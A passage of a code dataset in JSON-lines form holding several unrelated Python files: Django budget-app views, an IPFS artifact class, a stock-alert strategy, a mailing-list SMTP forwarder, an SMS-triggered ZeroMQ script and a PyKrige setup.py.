HttpResponseRedirect(reverse('budget-index'))\n else:\n return render(request, 'budget/login.html') \n \ndef _logout(request):\n logout(request)\n return render(request, 'budget/login.html')\n \ndef register(request):\n if request.method != \"POST\":\n return render(request, 'budget/register.html')\n else:\n # Check if the passwords are identical\n if request.POST['password'] != request.POST['passwordagain']:\n return render(request, 'budget/register.html', {'error' : 'Passwords do not match.'})\n \n username = request.POST['username']\n password = request.POST['password']\n \n user = User.objects.create_user(username=username, password=password)\n \n return render(request, 'budget/login.html')\n\n@login_required\ndef index(request):\n user = request.user\n budget = Budget.objects.filter(\n user=user\n )\n if budget:\n return render(request, 'budget/index.html', {'budgets': budget})\n else:\n return render(request, 'budget/newbudget.html')\n\n@login_required\ndef budget(request, pk):\n user = request.user\n budget = Budget.objects.get(\n user=user,\n pk=pk,\n )\n form = TransactionForm()\n new_account_form = AccountForm()\n new_category_form = CategoryForm()\n new_allocation_form = AllocationForm()\n return render(request, 'budget/budget.html', {\n 'budget' : budget, \n 'form': form,\n 'new_account_form': new_account_form,\n 'new_category_form': new_category_form,\n 'new_allocation_form': new_allocation_form,\n })\n \n@login_required\n@require_http_methods([\"POST\"])\ndef create_transaction(request):\n f = TransactionForm(request.POST)\n new_transaction = f.save(commit=False)\n new_transaction.user = request.user\n new_transaction.budget = Budget.objects.get(pk=request.POST['id_budget'])\n new_transaction.save()\n return HttpResponseRedirect(reverse('budget-budget', args=[request.POST['id_budget']]))\n \n@login_required\ndef update_transaction(request, id_transaction):\n if request.method == \"GET\":\n instance = Transaction.objects.get(user=request.user,pk=id_transaction)\n form = TransactionForm(instance=instance)\n new_account_form = AccountForm()\n return render(request, 'budget/transaction-update.html', {\n 'budget' : budget, \n 'form': form, \n 'new_account_form': new_account_form, \n 'instance': instance\n })\n elif request.method == \"POST\":\n transaction = Transaction.objects.get(user=request.user, pk=id_transaction)\n form = TransactionForm(request.POST, instance=transaction)\n form.save()\n return HttpResponseRedirect(reverse('budget-budget', args=[transaction.budget.pk]))\n\n@login_required\n@require_http_methods([\"POST\"])\ndef delete_transaction(request, id_transaction):\n transaction = Transaction.objects.get(user=request.user, pk=id_transaction)\n transaction.delete()\n messages.info(request, 'Transaction deleted')\n return HttpResponseRedirect(reverse('budget-budget', args=[transaction.budget.pk]))\n \n@login_required\n@require_http_methods([\"POST\"])\ndef create_account(request):\n f = AccountForm(request.POST)\n new_account = f.save(commit=False)\n new_account.user = request.user\n new_account.budget = Budget.objects.get(pk=request.POST['id_budget'])\n new_account.save()\n t = Transaction(\n user = request.user,\n account = new_account,\n budget = new_account.budget,\n transaction_date = f.cleaned_data['initial_balance_date'],\n payee = \"Initial Balance\",\n category = None,\n inflow = f.cleaned_data['initial_balance'],\n cleared = True,\n \n )\n t.save()\n return HttpResponseRedirect(reverse('budget-budget', args=[request.POST['id_budget']]))\n \n@login_required\n@require_http_methods([\"POST\"])\ndef delete_account(request, id_account):\n account = Account.objects.get(user=request.user, pk=id_account)\n account.delete()\n messages.info(request, 'Account deleted')\n return HttpResponseRedirect(reverse('budget-budget', args=[account.budget.pk]))\n \n@login_required\n@require_http_methods([\"POST\"])\ndef create_category(request, id_parent_category):\n f = CategoryForm(request.POST)\n category = f.save(commit=False)\n category.user = request.user\n category.parentCategory = ParentCategory.objects.get(user=request.user, pk=id_parent_category)\n category.save()\n messages.info(request, 'Category %s created' % category.name)\n return HttpResponseRedirect(reverse('budget-budget', args=[request.POST['id_budget']]))\n \n@login_required\n@require_http_methods([\"POST\"])\ndef delete_category(request, id_category):\n category = get_object_or_404(\n Category,\n user = request.user,\n pk = id_category,\n )\n category.delete()\n return HttpResponseRedirect(reverse('budget-budget', args=[request.user.budget_set.all()[0].pk]))\n \n@login_required\n@require_http_methods([\"POST\"])\ndef create_allocation(request, category, year=2016, month=4):\n try:\n allocation = Allocation.objects.get(\n user = request.user,\n category = Category.objects.get(user=request.user, pk=category),\n month__year=int(year),\n month__month=int(month),\n )\n except ObjectDoesNotExist:\n f = AllocationForm(request.POST)\n allocation = f.save(commit=False)\n allocation.save(\n user = request.user,\n category = Category.objects.get(\n user = request.user,\n pk = category,\n ),\n month = datetime(int(year), int(month), 1),\n )\n allocation.amount = request.POST['amount']\n allocation.save() \n return HttpResponseRedirect(reverse('budget-budget', args=[request.user.budget_set.all()[0].pk]))","sub_path":"ynab/budget/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":7286,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"474800467","text":"# Copyright (C) 2018 Hatching B.V.\n# This file is licensed under the MIT License, see also LICENSE.\n\nimport hashlib\n\nfrom arbiter.ipfs import ipfs_open\n\nclass Artifact(object):\n def __init__(self, id, name, hash, url):\n self.id = id\n self.name = name\n self.hash = hash\n self.url = url\n self._sha256 = None\n\n def fetch(self):\n return ipfs_open(self.hash)\n\n def sha256(self):\n if not self._sha256:\n s = hashlib.sha256()\n with self.fetch() as fp:\n while True:\n tmp = fp.read(4096)\n if not tmp:\n break\n s.update(tmp)\n self._sha256 = s.hexdigest()\n return self._sha256\n","sub_path":"arbiter/artifacts.py","file_name":"artifacts.py","file_ext":"py","file_size_in_byte":757,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"209978624","text":"import tushare as ts\nimport requests\nimport json\nimport time\nfrom eventlet.greenpool import GreenPool\nfrom datetime import datetime, timedelta\nfrom easyquant import StrategyTemplate\nfrom easyquant.policy.manager import Manager\nfrom easyquant.easydealutils.time import previous_trade_date_from_now\nfrom easyquant.utils.utils import get_all_stock_codes\nfrom oslo_config import cfg\nfrom datetime import datetime\n\nopts = [\n cfg.StrOpt(\"alert_post_url\",\n help=\"alert post url\"),\n cfg.StrOpt(\"policy_post_url\",\n help=\"Policy post url\"),\n cfg.StrOpt(\"stock_owner_username\",\n help=\"Username used to get stocks for stop loss indicator\"),\n cfg.StrOpt(\"stock_owner_password\",\n help=\"Password used to get stocks for stop loss indicator\"),\n cfg.StrOpt(\"login_url\",\n help=\"login url to get stocks\"),\n cfg.StrOpt(\"query_stocks_url\",\n help=\"query url to get stocks\"),\n cfg.StrOpt(\"query_stocks_url\",\n help=\"query url to get stocks\"),\n cfg.StrOpt(\"statistics_post_url\",\n help=\"statistics post url\"),\n]\n\nCONF = cfg.CONF\nCONF.register_opts(opts)\n\nclass Strategy(StrategyTemplate):\n\n def __init__(self, user, log_handler, main_engine):\n super(Strategy, self).__init__(user, log_handler, main_engine)\n self.manager = Manager()\n self.define_indicators()\n self.define_get_val_funcs()\n self.define_rules()\n self.define_policies()\n self.policy_post_url = CONF.policy_post_url\n self.alert_post_url = CONF.alert_post_url\n self.statistics_post_url = CONF.statistics_post_url\n self.priority = 1\n\n def get_stocks_for_stop_loss_indicator(self):\n while True:\n try:\n s = requests.Session()\n # first login\n s.post(CONF.login_url, data={'user': CONF.stock_owner_username,\n 'password':\n CONF.stock_owner_password})\n r = s.get(CONF.query_stocks_url)\n break\n except Exception as e:\n print(\"Error: %s\" % str(e))\n time.sleep(60)\n\n # query stocks\n if r.status_code == 500:\n return []\n return json.loads(r.text)\n\n @staticmethod\n def get_hist_data(code):\n start_date = previous_trade_date_from_now(65)\n end_date = datetime.now() - timedelta(days=1)\n strstart = start_date.strftime('%Y-%m-%d')\n strend = end_date.strftime('%Y-%m-%d')\n hist = ts.get_hist_data(code, start=strstart, end=strend)\n return hist\n\n def run_before_strategy(self):\n if self.manager.load_indicators():\n self.log.info(\"All indicators loaded successfully\")\n return\n self.manager.reset()\n self.create_stop_loss_price_indicator()\n self.define_user_stocks_rule()\n start_time = datetime.now()\n stock_codes = get_all_stock_codes(True)\n gp = GreenPool()\n for code in stock_codes:\n if code[0: 2] not in ['00', '60', '30']:\n continue\n gp.spawn(self.manager.prepare,\n code, Strategy.get_hist_data)\n gp.waitall()\n self.manager.save()\n self.log.info(\"rub_before_strategy completed. Start from %s\"\n % start_time.strftime(\"%Y-%m-%d %H:%M\"))\n\n def strategy(self, event):\n result = self.manager.run(event.data)\n updated = False\n for policy, data in result.items():\n if data['updated'] and self.policy_post_url:\n updated = True\n if self.manager.get_policy(policy).alert and \\\n data['updated']:\n alert_contents = []\n for key in data['updated']:\n data['result'][key]['code'] = key\n alert_contents.append(data['result'][key])\n action = \"sell\" if policy in \\\n [\"stoploss\", \"sell_when_ma20btnow\" ] else \"buy\"\n send_data = {'type': 'stock',\n 'priority':\n self.manager.get_policy(policy).priority,\n 'data': {'stocks': alert_contents,\n 'action': action,\n 'system': policy}}\n self.log.info(\"New alert for policy %s\" % policy)\n\n requests.post(self.alert_post_url,\n json = send_data)\n data.pop('updated')\n\n if updated:\n requests.post(self.policy_post_url,\n json = result)\n\n def define_indicators(self):\n self.manager.indicator_create('edge_cls', name='highest_20',\n column='high', days=20)\n self.manager.indicator_create('edge_cls', name='highest_30',\n column='high', days=30)\n self.manager.indicator_create('edge_cls', name='highest_60',\n column='high', days=60)\n self.manager.indicator_create('cv_cls', name='cv_20', column='close',\n days=20)\n self.manager.indicator_create('cv_cls', name='cv_60', column='close',\n days=60)\n\n self.manager.indicator_create(\"continuouse_red_days_cls\",\n name='redday_60',\n expected_continuous_days=5,\n days=60)\n self.manager.indicator_create(\"yesterday_updown_stock_count_cls\",\n name='updown')\n self.manager.indicator_create(\"today_updown_stock_count_cls\",\n name='today_updown')\n self.manager.indicator_create(\"continuous_big_red_days_cls\",\n expected_continuous_days=4,\n name='big_redday_60')\n self.manager.indicator_create(\"volume_mean_cls\",\n name='volume_mean')\n\n self.create_stop_loss_price_indicator()\n self.manager.indicator_create(\n \"latest_trade_day_ma20_less_than_ma5_cls\",\n name='ma20ltma5')\n self.manager.indicator_create(\n \"latest_trade_day_ma20_cls\",\n name='ma20')\n\n def create_stop_loss_price_indicator(self):\n stocks = self.get_stocks_for_stop_loss_indicator()\n code_price_dict = {}\n for stock in stocks:\n code_price_dict[stock[\"code\"]] = stock[\"stop_loss_price\"]\n self.log.info(\"Creating stop loss price indicator for \"\n \"stocks: %s\" % code_price_dict)\n self.manager.indicator_create(\"stop_loss_price_cls\",\n name='stoploss',\n code_stoplossprice_dict=code_price_dict)\n\n def define_get_val_funcs(self):\n self.manager.get_val_func_create('get_fixed_value_func', 'fix_500',\n 500)\n self.manager.get_val_func_create('get_fixed_value_func', 'fix_2',\n 2)\n self.manager.get_val_func_create('get_fixed_value_func', 'fix_1',\n 1)\n self.manager.get_val_func_create('get_fixed_value_func', 'fix_8',\n 8)\n self.manager.get_val_func_create('get_fixed_value_func', 'fix_10',\n 10)\n self.manager.get_val_func_create('get_fixed_value_func', 'fix_30',\n 30)\n self.manager.get_val_func_create('get_fixed_value_func', 'fix_True',\n True)\n self.manager.get_val_func_create('get_fixed_value_func', 'fix_False',\n False)\n self.manager.get_val_func_create('get_value_by_key_func', 'key_now',\n 'now')\n self.manager.get_val_func_create('get_value_by_key_func',\n 'key_turnover', 'turnover')\n self.manager.get_val_func_create('get_value_by_key_ignore_zero_func',\n 'key_now_ignore_zero',\n 'now')\n\n def define_user_stocks_rule(self):\n stocks = self.get_stocks_for_stop_loss_indicator()\n codes = [s[\"code\"] for s in stocks]\n self.manager.selectedcodesrule_create('user_stocks_rule', codes)\n\n def define_rules(self):\n self.manager.rule_create('highest_20_rule', \"key_now\", '>',\n 'highest_20')\n self.manager.rule_create('highest_60_rule', \"key_now\", '>',\n 'highest_60')\n self.manager.rule_create('highest_30_rule', \"key_now\", '>',\n 'highest_30')\n self.manager.rule_create('cv_20_rule', \"fix_500\", '>',\n 'cv_20')\n self.manager.rule_create('cv_20_strict_rule', \"fix_2\", '>',\n 'cv_20')\n self.manager.rule_create('cv_60_rule', \"fix_500\", '>',\n 'cv_60')\n self.manager.rule_create('cv_60_strict_rule', \"fix_2\", '>',\n 'cv_60')\n self.manager.rule_create('cv_60_lt_10_rule', \"fix_10\", '>',\n 'cv_60')\n self.manager.rule_create('redday_60_rule', \"fix_1\", '<',\n 'redday_60')\n self.manager.rule_create('big_redday_60_rule', \"fix_1\", '<',\n 'big_redday_60')\n\n self.manager.rule_create('stop_loss_price_rule', \"key_now_ignore_zero\",\n '<', 'stoploss')\n self.manager.rule_create('today_updown_stocks_rule', \"fix_30\",\n '<', 'today_updown')\n self.manager.rule_create('ma20ltma5_true_rule',\n 'fix_True', '=', 'ma20ltma5')\n self.manager.rule_create('ma20ltma5_false_rule',\n 'fix_False', '=', 'ma20ltma5')\n self.manager.rule_create('now_lt_ma20_rule',\n 'key_now', '<', 'ma20')\n self.manager.rule_create('volume_bt_4Xvmean_rule',\n 'key_turnover', '>', 'volume_mean')\n\n self.define_user_stocks_rule()\n self.manager.topprofitstockrule_create('top_profit_ratio_rule')\n\n\n def define_policies(self):\n\n self.manager.policy_create('system1-500cv',\n ['highest_20_rule',\n 'today_updown_stocks_rule',\n 'cv_20_rule'])\n\n self.manager.policy_create('system2-500cv',\n ['highest_60_rule',\n 'today_updown_stocks_rule',\n 'cv_60_rule'])\n\n self.manager.policy_create('system1-2cv', ['highest_20_rule',\n 'redday_60_rule',\n 'cv_20_strict_rule',\n 'ma20ltma5_true_rule',\n 'today_updown_stocks_rule'],\n alert=True)\n\n self.manager.policy_create('system2-2cv', ['highest_60_rule',\n 'redday_60_rule',\n 'cv_60_strict_rule',\n 'ma20ltma5_true_rule',\n 'today_updown_stocks_rule'],\n alert=True, priority=2)\n\n self.manager.policy_create('fjj', ['redday_60_rule'])\n self.manager.policy_create('stoploss', ['stop_loss_price_rule'],\n alert=True, priority=2)\n self.manager.policy_create('sell_when_ma20btnow',\n ['user_stocks_rule',\n 'now_lt_ma20_rule'],\n alert=True, priority=2)\n\n self.manager.policy_create('bigreddays-10cv-30break',\n ['highest_30_rule',\n 'cv_60_lt_10_rule',\n 'big_redday_60_rule',\n 'ma20ltma5_true_rule',\n 'volume_bt_4Xvmean_rule',\n 'today_updown_stocks_rule'],\n priority=1, alert=True)\n self.manager.policy_create('topprofit',\n ['top_profit_ratio_rule'])\n\n def push_statistics(self):\n try:\n result = self.manager.get_indicator_results(\"today_updown\",\n 'market')\n send_data={'update_time': datetime.now().strftime(\"%m-%d %H:%M\")}\n send_data[\"today_updown\"] = result\n requests.post(self.statistics_post_url,\n json=send_data)\n except Exception:\n self.log.info(\"push statistics error\")\n\n def clock(self, event):\n if event.data.clock_event == 'open':\n # 开市了\n self.log.info('open')\n elif event.data.clock_event == 'close':\n # 收市了\n self.log.info('close')\n elif event.data.clock_event == 5:\n # 5 分钟的 clock\n self.log.info(\"5分钟\")\n self.push_statistics()\n elif event.data.clock_event == 30:\n self.log.info(\"30分钟\")\n elif event.data.clock_event == 'newday':\n self.log.info(\"%s newday\" % self.name)\n self.reload()\n\n def shutdown(self):\n \"\"\"\n 关闭进程前调用该函数\n :return:\n \"\"\"\n if self._initing:\n self.manager.save()\n","sub_path":"strategies/policystrategy.py","file_name":"policystrategy.py","file_ext":"py","file_size_in_byte":14262,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"539309955","text":"# encoding: utf8\nimport datetime\nimport email.utils\nimport itertools\nimport json\nimport os\nimport re\nimport sys\nimport textwrap\nimport traceback\n\nfrom emailtunnel import SMTPForwarder, Message, InvalidRecipient, logger\nfrom emailtunnel.mailhole import MailholeRelayMixin\n\nfrom django.db import connection\nfrom django.conf import settings\n\nfrom mftutor.aliases.models import resolve_alias\nfrom mftutor.tutor.models import Tutor, TutorGroup, RusClass, Rus\n\n\ndef abbreviate_recipient_list(recipients):\n if all('@' in rcpt for rcpt in recipients):\n parts = [rcpt.split('@', 1) for rcpt in recipients]\n parts.sort(key=lambda x: (x[1].lower(), x[0].lower()))\n by_domain = [\n (domain, [a[0] for a in aa])\n for domain, aa in itertools.groupby(\n parts, key=lambda x: x[1])\n ]\n return ', '.join(\n '<%s@%s>' % (','.join(aa), domain)\n for domain, aa in by_domain)\n else:\n return ', '.join('<%s>' % x for x in recipients)\n\n\ndef now_string():\n \"\"\"Return the current date and time as a string.\"\"\"\n return datetime.datetime.now().strftime(\"%Y-%m-%d_%H-%M-%S.%f\")\n\n\nclass ForwardToAdmin(Exception):\n pass\n\n\ndef get_tutorprofile_email(tp):\n # Avoid blacklisting by relaying through @post.au.dk addresses.\n # valid_studentnumber = re.match(r'^201\\d+$', tp.studentnumber)\n # if tp.email.endswith('@gmail.com') and valid_studentnumber:\n # return '%s@post.au.dk' % tp.studentnumber\n return tp.email\n\n\nclass TutorForwarder(SMTPForwarder, MailholeRelayMixin):\n REWRITE_FROM = True\n STRIP_HTML = True\n\n MAIL_FROM = 'admin@TAAGEKAMMERET.dk'\n\n ERROR_TEMPLATE = \"\"\"\n Nedenstående email blev ikke leveret til nogen.\n\n {reason}\n\n {message}\n \"\"\"\n\n def __init__(self, *args, **kwargs):\n self.gf_year = kwargs.pop('gf_year', None)\n self.tutor_year = kwargs.pop('tutor_year', None)\n self.rus_year = kwargs.pop('rus_year', None)\n\n years = (self.gf_year, self.tutor_year, self.rus_year)\n if all(years):\n self.year_log = (\"Year from kwargs: (%s, %s, %s)\" %\n (self.gf_year, self.tutor_year, self.rus_year))\n else:\n if any(years):\n logger.error(\"must specify all of gf_year, tutor_year, \" +\n \"rus_year or none of them\")\n self.gf_year = settings.YEAR\n self.tutor_year = settings.TUTORMAIL_YEAR\n self.rus_year = settings.RUSMAIL_YEAR\n self.year_log = (\"Year from mftutor.settings: (%s, %s, %s)\" %\n (self.gf_year, self.tutor_year, self.rus_year))\n\n self.gf_groups = kwargs.pop(\n 'gf_groups', settings.GF_GROUPS)\n self.rusclass_base = kwargs.pop(\n 'rusclass_base', settings.RUSCLASS_BASE)\n super(TutorForwarder, self).__init__(*args, **kwargs)\n\n self.exceptions = set()\n\n def should_mailhole(self, message, recipient, sender):\n # Send everything to mailhole\n return True\n\n def startup_log(self):\n logger.info('TutorForwarder listening on %s:%s, ' +\n 'relaying to mailhole. %s',\n self.host, self.port, self.year_log)\n\n def reject(self, envelope):\n if envelope.mailfrom == '<>':\n # RFC 5321, 4.5.5. Messages with a Null Reverse-Path:\n # \"[Automated email processors] SHOULD NOT reply to messages\n # with a null reverse-path, and they SHOULD NOT add a non-null\n # reverse-path, or change a null reverse-path to a non-null one,\n # to such messages when forwarding.\"\n # Since we would forward this message with a non-null reverse-path,\n # we should reject it instead.\n return True\n rcpttos = tuple(r.lower() for r in envelope.rcpttos)\n subject = str(envelope.message.subject)\n return (rcpttos == ('webfar@matfystutor.dk',)\n and ('Delayed Mail' in subject\n or 'Undelivered Mail Returned to Sender' in subject))\n\n def handle_envelope(self, envelope, peer):\n try:\n if self.reject(envelope):\n description = summary = 'Rejected due to reject()'\n self.store_failed_envelope(envelope, description, summary)\n return\n return super(TutorForwarder, self).handle_envelope(envelope, peer)\n except ForwardToAdmin as e:\n self.forward_to_admin(envelope, e.args[0])\n finally:\n connection.close()\n\n def forward(self, original_envelope, message, recipients, sender):\n if self.REWRITE_FROM:\n del message.message[\"DKIM-Signature\"]\n orig_from = message.get_header(\"From\")\n parsed = email.utils.getaddresses([orig_from])\n orig_name = parsed[0][0]\n name = \"%s via matfystutor\" % orig_name\n addr = \"webfar@matfystutor.dk\"\n new_from = email.utils.formataddr((name, addr))\n message.set_unique_header(\"From\", new_from)\n message.set_unique_header(\"Reply-To\", orig_from)\n if self.STRIP_HTML:\n from emailtunnel.extract_text import get_body_text\n\n del message.message[\"DKIM-Signature\"]\n t = get_body_text(message.message)\n message.set_unique_header(\"Content-Type\", \"text/plain\")\n del message.message[\"Content-Transfer-Encoding\"]\n charset = email.charset.Charset(\"utf-8\")\n charset.header_encoding = charset.body_encoding = email.charset.QP\n message.message.set_payload(t, charset=charset)\n\n super().forward(original_envelope, message, recipients, sender)\n\n def get_envelope_mailfrom(self, envelope):\n return self.MAIL_FROM.lower()\n\n def translate_recipient(self, rcptto):\n name, domain = rcptto.split('@')\n if name == 'alle':\n raise ForwardToAdmin('Mail til alle')\n if name == 'wiki':\n raise InvalidRecipient(name)\n if name == 'ravtest':\n return ['mathiasrav@outlook.dk']\n groups = self.get_groups(name)\n if groups:\n emails = []\n if any(g[0].handle == 'best' for g in groups):\n emails.append('matfys.udd.nat@au.dk')\n groups = [g for g in groups if g[0].handle != 'best']\n emails += self.get_group_emails(name, groups)\n if not emails:\n raise ForwardToAdmin('Grupper er tomme: %r' % (groups,))\n return emails\n\n tutors_only, rusclasses = self.get_rusclasses(name)\n if rusclasses is not None:\n emails = self.get_rusclass_emails(tutors_only, rusclasses)\n if not emails:\n raise ForwardToAdmin('Ingen tutor/rus-modtagere: %r' %\n (groups,))\n return emails\n\n raise InvalidRecipient(name)\n\n def get_groups(self, recipient):\n \"\"\"Get all TutorGroups that an alias refers to.\"\"\"\n try:\n group_names = resolve_alias(recipient)\n except Exception:\n logger.exception(\"resolve_alias raised an exception - \" +\n \"reconnecting to the database and trying again\")\n # https://code.djangoproject.com/ticket/21597#comment:29\n connection.close()\n group_names = resolve_alias(recipient)\n groups = []\n for name in group_names:\n group_and_year = self.get_group(name)\n if group_and_year is not None:\n groups.append(group_and_year)\n return groups\n\n def get_group(self, group_name):\n \"\"\"Resolves a concrete group name to a (group, year)-tuple.\n\n Returns None if the group name is invalid,\n or a tuple (group, year) where group is a TutorGroup\n and year is the year to find the tutors in.\n \"\"\"\n\n # Find the year\n group_name = group_name.lower()\n if group_name in self.gf_groups:\n year = self.gf_year\n elif group_name.startswith('g') and group_name[1:] in self.gf_groups:\n year = self.gf_year - 1\n group_name = group_name[1:]\n else:\n year = self.tutor_year\n\n # Is name a tutorgroup?\n try:\n group = TutorGroup.objects.get(handle=group_name, year=year)\n except TutorGroup.DoesNotExist:\n return None\n\n # Disallow 'alle'\n if group.handle == 'alle':\n return None\n\n return (group, year)\n\n def get_group_emails(self, name, groups):\n emails = []\n for group, year in groups:\n # TODO: After TutorGroup has a year field, this year-filter is\n # perhaps unwanted/unnecessary.\n group_tutors = Tutor.objects.filter(\n groups=group, year=year,\n early_termination__isnull=True)\n group_emails = [get_tutorprofile_email(tutor.profile) for tutor in group_tutors]\n emails += [email for email in group_emails\n if email is not None]\n\n # Remove duplicate email addresses\n return sorted(set(emails))\n\n def get_rusclasses(self, recipient):\n \"\"\"(tutors_only, list of RusClass)\"\"\"\n year = self.rus_year\n\n tutors_only_prefix = 'tutor+'\n if recipient.startswith(tutors_only_prefix):\n recipient = recipient[len(tutors_only_prefix):]\n tutors_only = True\n else:\n tutors_only = False\n\n rusclasses = None\n\n for official, handle, internal in self.rusclass_base:\n if recipient == handle:\n rusclasses = list(RusClass.objects.filter(\n year=year,\n handle__startswith=recipient))\n\n if rusclasses is None:\n try:\n rusclasses = [RusClass.objects.get(year=year, handle=recipient)]\n except RusClass.DoesNotExist:\n pass\n\n return (tutors_only, rusclasses)\n\n def get_rusclass_emails(self, tutors_only, rusclasses):\n tutor_emails = [\n get_tutorprofile_email(tutor.profile)\n for tutor in Tutor.objects.filter(rusclass__in=rusclasses)\n ]\n if tutors_only:\n rus_emails = []\n else:\n rus_emails = [\n get_tutorprofile_email(rus.profile)\n for rus in Rus.objects.filter(rusclass__in=rusclasses)\n ]\n\n emails = tutor_emails + rus_emails\n\n return sorted(set(email for email in emails if email))\n\n def log_receipt(self, peer, envelope):\n mailfrom = envelope.mailfrom\n rcpttos = envelope.rcpttos\n message = envelope.message\n\n if type(mailfrom) == str:\n sender = '<%s>' % mailfrom\n else:\n sender = repr(mailfrom)\n\n if type(rcpttos) == list and all(type(x) == str for x in rcpttos):\n recipients = ', '.join('<%s>' % x for x in rcpttos)\n else:\n recipients = repr(rcpttos)\n\n logger.info(\"Subject: %r From: %s To: %s\",\n str(message.subject), sender, recipients)\n\n def log_delivery(self, message, recipients, sender):\n recipients_string = abbreviate_recipient_list(recipients)\n logger.info('Subject: %r To: %s',\n str(message.subject), recipients_string)\n\n def handle_invalid_recipient(self, envelope, exn):\n self.store_failed_envelope(\n envelope, str(exn), 'Invalid recipient: %s' % exn)\n\n def handle_error(self, envelope, str_data):\n exc_value = sys.exc_info()[1]\n exc_typename = type(exc_value).__name__\n filename, line, function, text = traceback.extract_tb(\n sys.exc_info()[2])[0]\n\n tb = ''.join(traceback.format_exc())\n if envelope:\n self.store_failed_envelope(\n envelope, str(tb),\n '%s: %s' % (exc_typename, exc_value))\n\n exc_key = (filename, line, exc_typename)\n\n if exc_key not in self.exceptions:\n self.exceptions.add(exc_key)\n self.forward_to_admin(envelope, tb)\n\n def forward_to_admin(self, envelope, reason):\n admin_emails = ['mathiasrav@gmail.com']\n sender = recipient = 'webfar@matfystutor.dk'\n\n subject = '[TutorForwarder] %s' % (reason[:50],)\n body = textwrap.dedent(self.ERROR_TEMPLATE).format(\n reason=reason, message=envelope.message)\n admin_message = Message.compose(\n sender, recipient, subject, body)\n admin_message.add_header('Auto-Submitted', 'auto-replied')\n self.deliver(admin_message, admin_emails, sender)\n\n def store_failed_envelope(self, envelope, description, summary):\n now = now_string()\n\n try:\n os.mkdir('error')\n except OSError:\n pass\n\n with open('error/%s.mail' % now, 'wb') as fp:\n fp.write(envelope.message.as_bytes())\n\n with open('error/%s.json' % now, 'w') as fp:\n metadata = {\n 'mailfrom': envelope.mailfrom,\n 'rcpttos': envelope.rcpttos,\n 'subject': str(envelope.message.subject),\n 'date': envelope.message.get_header('Date'),\n 'summary': summary,\n }\n json.dump(metadata, fp)\n\n with open('error/%s.txt' % now, 'w') as fp:\n fp.write('From %s\\n' % envelope.mailfrom)\n fp.write('To %s\\n\\n' % envelope.rcpttos)\n fp.write('%s\\n' % description)\n fp.write(str(envelope.message))\n","sub_path":"tutormail/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":13631,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"268685737","text":"import logging\nfrom time import sleep\nfrom serial import Serial\nfrom sim_900 import Sim900a\nfrom zmq_serv import ZmqSev\n\n# -*-*config*-*-\nwork_ip = '0.0.0.0' # Принемать конекты с ip\nport = '18735'\nchannel = 'sms' # Канал для отправки сообщений\ncommand_in_channel = 'power off' # Каманда каторую отправит серв в канал если условие вернно\nsim_seria = r'/dev/serial0' # uart(com) к модулю\ntrigger = \"sms['text'] in b'off'\" # Условие для отправки command_in_channel\n# -*-*config*-*-\n\n\nlogging.basicConfig(level=logging.DEBUG,\n format='{levelname}[{asctime}]({name})[{processName}:{threadName}:{funcName}] {message}',\n style='{',\n datefmt='%d.%m.%y %H:%M:%S',\n )\n\nlog = logging.getLogger('main')\n\ngsm = Sim900a(serial=Serial(port=sim_seria, baudrate=9600, timeout=2),log=log.getChild('gsm'))\nnod = ZmqSev(ip=work_ip, port=port, log=log.getChild('nod'))\n\nwhile True:\n sms_s = gsm.get_all_sms()\n if not sms_s: # Если новых сообщений нету то след. итерация\n sleep(1)\n continue\n\n for sms in sms_s:\n if eval(trigger):\n nod.send_channel(channel, command_in_channel)\n log.warning(f\"Отправил команду..{[channel.encode(), command_in_channel.encode()]} sms {sms} условие {trigger}\")\n\n gsm.del_sms(sms['index'].decode()[-1].encode())\n log.debug(f'Удаляю sms {sms}')\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1579,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"504173122","text":"import sys\r\nfrom setuptools import setup, Extension\r\nfrom Cython.Distutils import build_ext\r\nfrom os.path import join\r\nimport numpy as np\r\n\r\nimport Cython.Compiler.Options\r\n\r\nCython.Compiler.Options.annotate = False\r\n\r\nif sys.platform != 'win32':\r\n compile_args = dict( extra_compile_args=['-O2', '-march=core2', '-mtune=corei7'],\r\n extra_link_args=['-O2', '-march=core2', '-mtune=corei7'])\r\nelse:\r\n compile_args = {}\r\n\r\n\r\next_modules = [Extension(\"pykrige.lib.cok\",\r\n [\"pykrige/lib/cok.pyx\"],\r\n **compile_args),\r\n Extension(\"pykrige.lib.lapack\",\r\n [\"pykrige/lib/lapack.pyx\"],\r\n **compile_args),\r\n Extension(\"pykrige.lib.variogram_models\",\r\n [\"pykrige/lib/variogram_models.pyx\"],\r\n **compile_args),]\r\n\r\nclass build_ext_compiler_check(build_ext):\r\n def build_extensions(self):\r\n compiler = self.compiler\r\n if sys.platform != 'win32':\r\n build_ext.build_extensions(self)\r\n else:\r\n print(\"Warning: the C extensions will not be built since the compiler could not be found.\\n\"\\\r\n \"See https://github.com/bsmurphy/PyKrige/issues/8 \")\r\n\r\nsetup(name='PyKrige',\r\n version='1.2.0',\r\n author='Benjamin S. Murphy',\r\n author_email='bscott.murphy@gmail.com',\r\n url='https://github.com/bsmurphy/PyKrige',\r\n description='Kriging Toolkit for Python',\r\n long_description='PyKrige is a kriging toolkit for Python that supports \\\r\n two- and three-dimensional ordinary and universal kriging.',\r\n packages=['pykrige'],\r\n package_data={'pykrige': ['README.md', 'CHANGELOG.md', 'LICENSE.txt', 'MANIFEST.in',\r\n join('test_data', '*.txt'), join('test_data', '*.asc')]},\r\n requires=['numpy', 'scipy', 'matplotlib', 'Cython'],\r\n classifiers=['Development Status :: 5 - Production/Stable',\r\n 'Intended Audience :: Science/Research',\r\n 'License :: OSI Approved :: BSD License',\r\n 'Programming Language :: Python',\r\n 'Topic :: Scientific/Engineering',\r\n 'Topic :: Scientific/Engineering :: GIS'],\r\n ext_modules=ext_modules,\r\n include_dirs=[np.get_include()],\r\n cmdclass={'build_ext': build_ext_compiler_check}, #build_ext},\r\n )\r\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":2471,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} 